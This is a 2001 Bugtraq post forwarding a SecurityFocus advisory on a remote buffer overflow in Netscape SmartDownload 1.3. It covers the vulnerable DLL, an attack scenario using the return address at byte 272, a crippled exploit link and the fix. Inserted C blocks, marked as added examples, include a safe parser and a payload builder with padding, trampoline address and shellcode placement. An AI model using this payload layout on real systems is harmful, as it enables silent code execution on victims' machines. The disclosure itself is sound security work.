
Netscape SmartDownload 1.3 Buffer Overflow Vulnerability

daemon@ATHENA.MIT.EDU (Alfred Huger)
Wed Apr 18 19:49:33 2001

MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID:  <Pine.GSO.4.30.0104181706300.28322-100000@mail>
Date:         Wed, 18 Apr 2001 17:18:02 -0600
Reply-To: Alfred Huger <ah@SECURITYFOCUS.COM>
From: Alfred Huger <ah@SECURITYFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM

Hey Folks,

Elias has asked me to forward this writeup of the Netscape SmartDownload
1.3 Buffer Overflow Vulnerability to the list. This information has been
published elsewhere but this is its first appearance on Bugtraq as it
were.

The format it is in is that of the commercial SecurityFocus Bugtraq Database,
and if you have questions as to what some of the headings are, there is a
legend at the end of the advisory.


---------------------------------------------------------------------------
                              Security Alert

Subject:     Netscape SmartDownload 1.3 Buffer Overflow Vulnerability
BUGTRAQ ID:  2615                    CVE ID:  CAN-2001-0262
Published:   April 13, 2001          Updated: April 18, 2001
Remote:      Yes                     Local:   No
Class:       Boundary Condition Error
Credibility: Vendor Confirmed        Ease:    Exploit Available

Impact:   10.00          Severity: 10.00           Urgency:  9.60

Last Change: Initial analysis.
---------------------------------------------------------------------------

Vulnerable Systems:

  Netscape SmartDownload 1.3

Non-Vulnerable Systems:

  Netscape SmartDownload 1.4

Summary:

  A buffer overflow present in a DLL used by  Netscape  SmartDownload  is
  exploitable even if the software is disabled.

Impact:

  Successfully exploiting the buffer overflow in sdph20.dll  would  allow
  an attacker to execute arbitrary code as the currently logged in  user.
  In Windows 95/98/Me, this means privileged access to all  resources  on
  the target host.

Technical Description:

  Netscape SmartDownload adds pause,  resume  and  auto-restart  download
  capabilities  to  common  web  browsers  such  as  Netscape  Navigator,
  Microsoft Internet Explorer and NeoPlanet. It is installed  by  default
  with SmartDownload versions of Netscape Communicator, and  marketed  as
  an add-on "download manager" for other browsers. It  is  available  for
  all Win32 platforms (Windows 95/98/Me, NT/2000).

  All URLs visited by a user are analyzed and parsed by SmartDownload for
  MIME type and extension to determine if the  SmartDownload  dialog  box
  should be presented, regardless of whether  Smartdownload  is  enabled.
  URLs parsed include web pages  viewed  within  the  browser  (including
  redirects), web pages within framesets and files  spawned  to  external
  viewers. Images, embeds and targets of object tags are  not  parsed  by
  SmartDownload.

  A bug in the library 'sdph20.dll' used  by  SmartDownload  prevents  it
  from properly parsing URLs greater than 256 characters in  length.  The
  parsing code in sdph20.dll reserves 256 characters for an  URL  on  the
  stack but an unchecked lstrcpy will copy URLs of arbitrary length  into
  that buffer, overwriting several local variables,  the  return  address
  and other parts of the stack.
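  The copy-then-parse pattern described above, reduced to standalone C as
  an added illustration. This is not sdph20.dll's code: the parsing logic
  (extracting a file extension), the helper names and the example URL are
  the example's own assumptions, while the 256-byte buffer and the
  272-byte return-address offset are the advisory's figures. It shows the
  vulnerable shape beside a bounded replacement that rejects oversized
  URLs instead of truncating them, plus two helpers that express how far a
  URL of a given length reaches into the stack.

```c
#include <stdio.h>
#include <string.h>

#define URL_BUF_SIZE    256   /* stack buffer reserved for the URL (advisory) */
#define RET_ADDR_OFFSET 272   /* offset of the saved return address (advisory) */

/* Bytes an unchecked copy of a url_len-byte URL writes past the end of the
 * 256-byte buffer.  strcpy (lstrcpy on Win32) copies the terminating NUL
 * too, so a 256-character URL already spills one byte. */
size_t overflow_bytes(size_t url_len)
{
    size_t copied = url_len + 1;
    return copied > URL_BUF_SIZE ? copied - URL_BUF_SIZE : 0;
}

/* 1 if the copy overwrites all four bytes of the return address at 272. */
int clobbers_return_address(size_t url_len)
{
    return url_len >= RET_ADDR_OFFSET + 4;
}

/* The vulnerable shape: fixed stack buffer, unchecked copy, then parsing.
 * Shown for comparison; feeding it a URL of 256+ bytes is the bug. */
void parse_url_vulnerable(const char *url, char *ext, size_t ext_size)
{
    char buf[URL_BUF_SIZE];
    strcpy(buf, url);                       /* BUG: no length check */
    const char *dot = strrchr(buf, '.');
    snprintf(ext, ext_size, "%s", dot ? dot + 1 : "");
}

/* Hardened replacement: refuse anything that does not fit, copy with a
 * bound, and only then parse.  Returns 0 on success, -1 if too long. */
int parse_url_safe(const char *url, char *ext, size_t ext_size)
{
    char buf[URL_BUF_SIZE];
    size_t len = 0;
    while (len < URL_BUF_SIZE && url[len] != '\0')
        len++;
    if (len >= URL_BUF_SIZE)                /* no room for the NUL: reject */
        return -1;
    memcpy(buf, url, len + 1);

    buf[strcspn(buf, "?#")] = '\0';         /* extension lives in the path */
    const char *slash = strrchr(buf, '/');
    const char *name = slash ? slash + 1 : buf;
    const char *dot = strrchr(name, '.');
    snprintf(ext, ext_size, "%s", (dot && dot != name) ? dot + 1 : "");
    return 0;
}

/* Demo helper: run the safe parser on a URL made of url_len 'A' bytes. */
int parse_padded_url(size_t url_len)
{
    char url[2048];
    char ext[16];
    if (url_len >= sizeof url)
        return -1;
    memset(url, 'A', url_len);
    url[url_len] = '\0';
    return parse_url_safe(url, ext, sizeof ext);
}

int main(void)
{
    char ext[16];
    parse_url_safe("http://example.invalid/dl/setup.exe?id=1", ext, sizeof ext);
    printf("extension: %s\n", ext);
    printf("1000-byte URL: %zu bytes past the buffer, return address hit: %d, "
           "safe parser result: %d\n",
           overflow_bytes(1000), clobbers_return_address(1000),
           parse_padded_url(1000));
    return 0;
}
```

  The safe version rejects rather than truncates: silently cutting a URL
  at 255 bytes would still hand the rest of the code a URL that differs
  from the one the browser is about to fetch.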

  Analysis of sdph20.dll reveals that the ESI register will always  point
  to a location in memory with a predictable offset from the start of the
  URL buffer after the parser function returns. This means that shellcode
  [1] within the  URL  can  be  reached  with  a  CALL  ESI  or  JMP  ESI
  instruction if a known location containing either of those instructions
  is inserted in the return address (byte 272).

  If the overflow is successfully exploited, shellcode will  be  executed
  by the victim with the privileges of the currently logged in  user.  If
  the victim is using Windows 95, 98 or Me, the  shellcode  will  be  run
  with privileged access to all  system  resources  (local  Administrator
  access).

  [1] SmartDownload places some restrictions on the characters  permitted
  in an URL - namely, reserved URL characters such as # :  ?  and  &  are
  clipped or replaced. Additionally, the NULL character and some  control
  characters (ASCII < 32) are rejected outright by some web browsers.

Attack Scenarios:

  Attacker finds a memory location known to contain a JMP ESI or CALL ESI
  on the target host.

  Attacker creates a 1000-byte string designed to overflow the URL parser
  function in sdph20.dll. The attacker places the  ESI  jump  address  at
  byte 272 of the string, and pads the remainder  with  equivalent-to-NOP
  characters such as 0x41 (A).

  The attacker creates shellcode and places it  toward  the  end  of  the
  string.

  Attacker constructs a malicious webpage containing a redirect to the URL
  or an invisible frame containing the URL and lures the victim to the webpage.

  Attacker-supplied shellcode could, for example, download and install  a
  trojan horse or backdoor program on the victim host.
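  The attack string from the scenario above, laid out in C as an added
  example that is not part of the advisory or of the SecurityFocus
  utility. The 1000-byte length, the address at byte 272 and the 0x41
  padding are the advisory's; the example goes one step further and
  applies footnote [1]'s character rules as a filter to the whole string,
  return address included, on the reasoning that the address bytes travel
  inside the URL and must survive the same clipping. That inference, the
  trampoline value 0x7e5f6b62 and the 'C'-byte stand-in for shellcode are
  the example's own assumptions, not values from the advisory.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAYLOAD_LEN     1000   /* total string length (attack scenario) */
#define RET_ADDR_OFFSET 272    /* return address lands at byte 272 (advisory) */
#define PAD_BYTE        0x41   /* 'A': the NOP-equivalent padding named above */

/* Bytes SmartDownload clips/replaces or browsers reject (footnote [1]). */
int url_safe_byte(uint8_t b)
{
    if (b < 32)                                /* NUL and control characters */
        return 0;
    return b != '#' && b != ':' && b != '?' && b != '&';
}

/* Index of the first byte the filter would mangle, or -1 if all pass. */
long first_bad_byte(const uint8_t *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (!url_safe_byte(p[i]))
            return (long)i;
    return -1;
}

/* A JMP/CALL ESI location is usable only if all four little-endian bytes
 * of its address survive the URL filter (the example's inference). */
int addr_is_url_safe(uint32_t addr)
{
    uint8_t b[4] = { addr & 0xff, (addr >> 8) & 0xff,
                     (addr >> 16) & 0xff, (addr >> 24) & 0xff };
    return first_bad_byte(b, 4) == -1;
}

/* Build the 1000-byte string: padding, the trampoline address at byte 272
 * (little-endian, x86), more padding, shellcode at the very end.
 * Returns the payload length, or 0 if the shellcode does not fit. */
size_t build_payload(uint8_t *out, uint32_t trampoline,
                     const uint8_t *shellcode, size_t sc_len)
{
    if (sc_len > PAYLOAD_LEN - RET_ADDR_OFFSET - 4)
        return 0;
    memset(out, PAD_BYTE, PAYLOAD_LEN);
    out[RET_ADDR_OFFSET + 0] = trampoline & 0xff;
    out[RET_ADDR_OFFSET + 1] = (trampoline >> 8) & 0xff;
    out[RET_ADDR_OFFSET + 2] = (trampoline >> 16) & 0xff;
    out[RET_ADDR_OFFSET + 3] = (trampoline >> 24) & 0xff;
    memcpy(out + PAYLOAD_LEN - sc_len, shellcode, sc_len);
    return PAYLOAD_LEN;
}

/* Placeholders, NOT real values: a made-up JMP ESI address and 16 'C'
 * bytes standing in for shellcode.  A real payload needs a target-specific
 * address and code that itself passes url_safe_byte(). */
#define HYPOTHETICAL_JMP_ESI 0x7e5f6b62u
static const uint8_t STUB_SHELLCODE[] = "CCCCCCCCCCCCCCCC";

int main(void)
{
    uint8_t payload[PAYLOAD_LEN];
    size_t n = build_payload(payload, HYPOTHETICAL_JMP_ESI,
                             STUB_SHELLCODE, sizeof STUB_SHELLCODE - 1);
    printf("payload: %zu bytes, first filtered byte at %ld\n",
           n, first_bad_byte(payload, n));
    printf("0x00401000 usable as trampoline? %d (NUL and 0x10 are rejected)\n",
           addr_is_url_safe(0x00401000u));
    return 0;
}
```

  The filter is why the advisory says a "known location" must be found:
  a typical image-base address such as 0x00401000 contains a NUL and a
  control byte, so the usable trampolines are those whose address bytes
  all fall outside the rejected set.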

Exploits:

  A utility is available that generates a web page that will exploit this
  vulnerability. The exploit is intentionally crippled. This exploit
  written by the SecurityFocus staff is of special interest because it is
  executed transparently and without crashing the browser. A user who
  had this type of exploit leveraged against them by surfing otherwise
  innocent seeming web pages would never know they had been attacked and
  possibly backdoored. There is a popular conception that exploits like
  this on the client side (in terms of buffer overflows) will crash the
  browser and thereby alert the user to unusual activity. This is no
  longer the case.

  http://www.securityfocus.com/data/vulnerabilities/exploits/sdsploit.tar.gz

Mitigating Strategies:

  * Do not visit untrusted web sites

Solutions:

  Netscape has released SmartDownload 1.4, which does  not  contain  this
  bug.

  For Netscape SmartDownload 1.3:

    Upgrade to Netscape SmartDownload 1.4:
    http://home.netscape.com/download/smartdownload.html

Credit:

  Submitted to vulnhelp@securityfocus.com  on  2  March,  2001  by  Craig
  Davison <cd@securityfocus.com>, Ryan  Russell  <ryan@securityfocus.com>
  and Bruce Leidl <brl@core-sdi.com>. Also  discovered  independently  by
  Frank Swiderski <fes@atstake.com> and described in an  @stake  advisory
  which was released on 13 April, 2001.

References:

  web page:
  About SmartDownload (Netscape)
  http://home.netscape.com/computing/download/smartdownload/ib/about.html

  web page:
  Netscape SmartDownload Overflow (@stake)
  http://www.atstake.com/research/advisories/2001/a041301-1.txt

ChangeLog:

  Apr 18, 2001: Additional analysis.

---------------------------------------------------------------------------

HOW TO INTERPRET THIS ALERT

            BUGTRAQ ID: This  is  a  unique  identifier  assigned  to   the
                        vulnerability by SecurityFocus.com.

                CVE ID: This  is  a  unique  identifier  assigned  to   the
                        vulnerability by the CVE.

             Published: The date the vulnerability was first made public.

               Updated: The date the information was last updated.

                Remote: Whether   this   is    a    remotely    exploitable
                        vulnerability.

                 Local: Whether   this    is    a    locally    exploitable
                        vulnerability.

           Credibility: Describes how credible the  information  about  the
                        vulnerability is. Possible values are:

                        Conflicting Reports: There are multiple conflicting
                        reports about the existence of the vulnerability.

                        Single  Source:  There  is  a  single  non-reliable
                        source   reporting    the    existence    of    the
                        vulnerability.

                        Reliable Source: There is a single reliable  source
                        reporting the existence of the vulnerability.

                        Conflicting Details:  There  is  consensus  on  the
                        existence  of  the  vulnerability  but   not   its
                        details.

                        Multiple  Sources:  There  is  consensus   on   the
                        existence and details of the vulnerability.

                        Vendor Confirmed:  The  vendor  has  confirmed  the
                        vulnerability.

                 Class: The class of vulnerability.  Possible  values  are:
                        Boundary Condition Error, Access Validation  Error,
                        Origin Validation Error,  Input  Validation  Error,
                        Failure  to  Handle  Exceptional  Conditions,  Race
                        Condition  Error,  Serialization  Error,  Atomicity
                        Error, Environment Error, and Configuration Error.

                  Ease: Rates  how  easily   the   vulnerability   can   be
                        exploited.  Possible   values   are:   No   Exploit
                        Available,  Exploit  Available,  and   No   Exploit
                        Required.

                Impact: Rates the impact of the vulnerability.  Its  range
                        is 1 through 10.

              Severity: Rates the severity of the vulnerability. Its  range
                        is 1 through 10.  It  is  computed  from  the  impact
                        rating and remote flag. Remote vulnerabilities  with
                        a  high  impact  rating  receive  a  high  severity
                        rating. Local vulnerabilities  with  a  low  impact
                        rating receive a low severity rating.

               Urgency: Rates how quickly you should take action to fix  or
                        mitigate the vulnerability. Its range is 1 through
                        10. It is computed from  the  severity  rating,  the
                        ease  rating,  and  the  credibility  rating.  High
                        severity vulnerabilities with a high  ease  rating,
                        and a high credibility rating have a higher urgency
                        rating. Low severity  vulnerabilities  with  a  low
                        ease rating, and a low credibility rating  have  a
                        lower urgency rating.

           Last Change: The  last  change   made   to   the   vulnerability
                        information.

    Vulnerable Systems: The list of vulnerable systems. A '+'  preceding  a
                        system  name  indicates  that  one  of  the  system
                        components is vulnerable.  For  example,
                        Windows 98 ships with Internet Explorer.  So  if  a
                        vulnerability is found in IE you may see  something
                        like:

                        Microsoft Internet Explorer
                        + Microsoft Windows 98

Non-Vulnerable Systems: The list of non-vulnerable systems.

               Summary: A concise summary of the vulnerability.

                Impact: The impact of the vulnerability.

 Technical Description: The in-depth description of the vulnerability.

      Attack Scenarios: Ways an attacker may make use of the vulnerability.

              Exploits: Exploit instructions or programs.

 Mitigating Strategies: Ways to mitigate the vulnerability.

             Solutions: Solutions to the vulnerability.

                Credit: Information about who disclosed the vulnerability.

            References: Sources of information on the vulnerability.

     Related Resources: Resources that might be of additional value.

             ChangeLog: History of changes to the vulnerability record.

---------------------------------------------------------------------------

                     Copyright 2001 SecurityFocus.com
